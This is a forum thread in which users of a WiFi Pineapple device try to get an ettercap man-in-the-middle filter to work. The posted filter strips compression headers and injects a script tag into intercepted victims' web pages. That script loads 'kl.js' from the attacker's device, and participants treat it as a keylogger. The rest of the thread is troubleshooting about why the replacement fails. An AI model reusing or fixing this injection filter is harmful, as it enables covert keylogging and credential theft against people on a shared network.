Ettercap Not Replacing

[Vulture]

Anyone here try using ettercap filters on the pineapple itself and not via a plugged in PC?

Ettercap appears to be working quite well except that my filter doesn't actually replace anything into the data stream.

Here is pretty much the most generic filter:

if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.dst == 80 || tcp.dst == 8080) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Nothing!");

}

}

if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.src == 80 || tcp.src == 8080) {

if (search(DATA.data, "<head>")){

replace("<head>","<head><script type="text/javascript" src="http://172.16.42.1/kl.js"></script>");

msg("iframe injected after <head>\n");

}

if (search(DATA.data, "<HEAD>")){

replace("<HEAD>","<HEAD><script type="text/javascript" src="http://172.16.42.1/kl.js"></SCRIPT>");

msg("iframe injected after <HEAD>\n");

}

}

The msgs are being triggered, but the stream sent to the client contains none of the replaced data. Also, I noticed when you enable ettercap you must issue the "echo "1" > /proc/sys/net/ipv4/ip_forward" command for ICS to still be enabled.

I have tried the following adapters: wlan0, br-lan, 3g-wan2 (Internet)

Command I am running: ettercap -T -i 3g-wan2 -q -F test.ef

[Whistle Master]

I can't be of any help for the moment but I will investigate some stuff in the same direction.

Let me guess, kl.js means keylogger :P In that case, this thread could interest you.

Whenever one of us finds a solution with ettercap which works, he can post to the forum :)

Edited April 10, 2012 by Whistle Master

[Vulture]

I can't be of any help for the moment but I will investigate some stuff in the same direction.

Let me guess, kl.js means keylogger :P In that case, this thread could interest you.

Whenever one of us finds a solution which works, he can post to the forum :)

Whistle Master,

I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof however that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night, if what I am doing doesn't work I will probably just shift gears and create a bunch of templates for your module.

[Whistle Master]

Whistle Master,

I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof however that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night, if what I am doing doesn't work I will probably just shift gears and create a bunch of templates for your module.

Darren's comment also got my attention. I'm also working on a new version of the module to get off dnsspoof and use ettercap which will be great as we would not need templates any more :)

Keep me posted if you manage to make ettercap working!

[Whistle Master]

I made some tests tonight without any success. I have the same issue as you have, no replacement are made.

I tried to output the data to file to see the content:

log(DATA.data, "/tmp/log.txt");

But doesn't give me much information :(

[secret4all]

Any progress on this issue, I installed Ettercap but can't inject data. Any other mean for injection?